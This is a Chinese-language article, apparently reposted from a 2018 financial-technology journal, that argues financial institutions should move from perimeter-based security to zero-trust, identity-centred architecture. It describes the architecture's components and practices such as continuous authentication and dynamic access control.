行业现状:近年来,新兴科技与金融业务的深度融合,使金融业态复杂多变,潜在的网络安全风险不容忽视。APT攻击、内部威胁等新型攻击手段也花样翻新,层出不穷,给数字时代的金融科技带来了严峻的挑战。在这样的背景下,零信任安全架构(ZeroTrustSecurity)逐渐浮出水面。Google基于零信任的企业安全架构改造项目,BeyondCorp的成功实施,更是引发了业界的高度关注。

为什么要引入零信任?

数字时代的金融创新业务大多基于云和大数据平台构建,这种IT技术架构导致了业务和数据的集中,同时也造成了网络安全风险的集中。 在诸多网络安全风险中,数据安全风险是金融机构最关心的问题。 近年来,大型企业数据泄露事件屡见不鲜,其中也不乏大型的金融机构。对数据安全风险的担忧往往成为金融机构数字化转型的最大障碍。

据有关机构调查分析,内部人员威胁是造成企业数据泄露的第二大原因。企业员工、外包人员等内部用户通常拥有特定业务和数据的合法访问权限,一旦出现凭证丢失、权限滥用或非授权访问等问题,往往会导致企业的数据泄漏。 外部黑客攻击是造成企业数据泄露的第一大原因。 美国Verizon公司《2017年数据泄露报告》分析指出,攻击者渗透进企业的内网之后,并没有采用什么高明的手段窃取数据,81%的攻击者只是利用偷来的凭证或者“爆破”得到的弱口令,就轻而易举地获得了系统和数据的访问权限。

造成数据泄露的两大原因值得我们深入思考:企业的安全意识在不断提高,网络安全防护体系建设的投入也在不断加大,为什么类似数据泄露这样的安全事件并没有得到很好的遏制,反而有愈演愈烈的趋势?我们在企业网络安全体系建设上忽视了什么?

提到网络安全防护,人们第一时间会考虑如何对抗具体的威胁。例如,通过消费威胁情报构建积极防御能力,对抗高级威胁、APT攻击等。这些防护措施当然必不可少,而且必须随着威胁的升级持续演进。但是,在企业构建网络安全体系的过程中,人们往往忽视最基础的架构安全能力建设。 网络安全架构往往伴随IT技术架构的变革不断演进,而数字化转型的技术本质恰恰是IT技术架构的剧烈变革。 在新的IT技术架构下,传统的网络安全架构理念如果不能随需应变,自然会成为木桶最短的那块木板。

传统的网络安全架构理念是基于边界的安全架构。企业构建网络安全体系时,首先寻找安全边界,把网络划分为外网、内网、DMZ区等不同的区域,然后在边界上通过部署防火墙、WAF、IPS等网络安全产品/方案进行重重防护,构筑企业业务的数字护城河。这种网络安全架构假设或默认了内网比外网更安全,在某种程度上预设了对内网中的人、设备和系统的信任,从而忽视内网安全措施的加强。于是,攻击者一旦突破企业的网络安全边界进入内网,常常会如入无人之境。

此外,云计算等的快速发展导致传统的内外网边界模糊,很难找到物理上的安全边界。企业自然无法基于传统的安全架构理念构筑安全基础设施,只能诉诸于更灵活的技术手段对动态变化的人、设备、系统进行识别、认证、访问控制和审计,以身份为中心的访问控制成为数字时代架构安全的第一道关口。 零信任安全架构正是拥抱了这种技术趋势,从而成为数字时代网络安全架构演进的必然选择。

零信任的技术方案与实践特点

零信任架构重新评估和审视了传统的边界安全架构,并给出了新思路:应该假设网络自始至终充满外部和内部威胁,不能仅凭网络位置来评估信任;默认情况下不应该信任网络内部或外部的任何人、设备、系统,需要基于认证和授权重构访问控制的信任基础;并且访问控制策略应该是动态的,基于设备和用户的多源环境数据计算得来。

零信任对访问控制进行了范式上的颠覆,引导网络安全架构从“网络中心化”走向“身份中心化”。从技术方案层面来看,零信任安全架构是借助现代身份管理技术实现对人、设备和系统的全面、动态、智能的访问控制。


零信任架构:网络安全新范式
图 零信任架构的技术方案

零信任架构的技术方案包含: 业务访问主体、业务访问代理和智能身份安全平台,三者之间的关系如上图所示。

业务访问主体:是业务请求的发起者,一般包括用户、设备和应用程序三类实体。在传统的安全方案中,这些实体一般单独进行认证和授权,但在零信任架构中,授权策略需要将这三类实体作为一个密不可分的整体来对待,这样可以极大地缓解凭证窃取等安全威胁。零信任架构落地实践中,常常将其简化为用户和设备的绑定关系。

业务访问代理:是业务访问数据平面的实际控制点,是强制访问控制的策略执行器。所有业务都隐藏在业务访问代理之后,只有完成设备和用户的认证,并且业务访问主体具备足够的权限,业务访问代理才对其开放业务资源,并建立起加密的业务访问数据通道。

智能身份平台:是零信任架构的安全控制平面。业务访问主体和业务访问代理分别通过与智能身份安全平台的交互,完成信任的评估和授权过程,并协商数据平面的安全配置参数。现代身份管理平台非常适合承担这一角色,完成身份认证、身份治理、动态授权和智能分析等任务。

零信任架构的技术实践具有以下特点。

以身份为中心:零信任的本质是以身份为中心进行动态访问控制,全面身份化是实现零信任的前提和基石。基于全面身份化,为用户、设备、应用程序、业务系统等物理实体建立统一的数字身份标识和治理流程,并进一步构筑动态访问控制体系,将安全边界延伸至身份实体。

持续身份认证:零信任架构认为一次性的身份认证无法确保身份的持续合法性,即便是采用了强度较高的多因子认证,也需要通过持续认证进行信任评估。例如,通过持续地对用户访问业务的行为、操作习惯等进行分析、识别和验证,动态评估用户的信任度。

动态访问控制:传统的访问控制机制是宏观的二值逻辑,大多基于静态的授权规则、黑白名单等技术手段进行一次性的评估。零信任架构下的访问控制基于持续度量的思想,是一种微观判定逻辑,通过对业务访问主体的信任度、环境的风险进行持续度量并动态判定是否授权。主体的信任度评估可以依据采用的认证手段、设备的健康度、应用程序是否企业分发等等;环境的评估则可能包括访问时间、来源IP地址、来源地理位置、访问频度、设备相似性等各种时空因素。

智能身份分析:零信任架构提倡的持续认证、动态访问控制等特性会显著地增加管理开销,只有引入智能身份分析,提升管理的自动化水平,才能更好地实现零信任架构的落地。智能身份分析可以帮助我们实现自适应的访问控制,还能够对当前系统的权限、策略、角色进行分析,发现潜在的策略违规并触发工作流引擎进行自动或人工干预的策略调整,实现治理的闭环。

零信任架构在实践机制上拥抱灰度哲学,以安全与易用平衡的持续认证改进固化的一次性强认证,以基于风险和信任持续度量的动态授权替代简单的二值判定静态授权,以开放智能的身份治理优化封闭僵化的身份管理。

结束语

基于零信任推动企业网络安全架构的重构应该上升到企业数字化转型的战略层面,与业务规划同步进行,并明确愿景和路线图,成立专门的组织,指派具有足够权限的负责人,才能保障零信任安全的落地和逐步实施。

金融机构通过实施零信任架构,可以构建“端到端”的、最小授权的业务动态访问控制机制,极大地收缩攻击面;采用智能身份分析技术,提升内外部攻击和身份欺诈的发现和响应能力。以此为保障,金融机构就能够安全地采用云、大数据和移动技术,提升业务的敏捷性;基于业务风险的有效管理框架,对合作伙伴开放敏感的业务和基础设施。

数字时代,零信任架构必将成为企业网络安全的新范式。金融机构应当开放心态,积极拥抱这种理念的变化,务实推动零信任架构的落地实践,为数字时代的金融科技和创新业务保驾护航。

本文节选自《金融电子化》2018年11月刊

声明:本文来自金融电子化,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Viewing all 12749 articles
Browse latest View live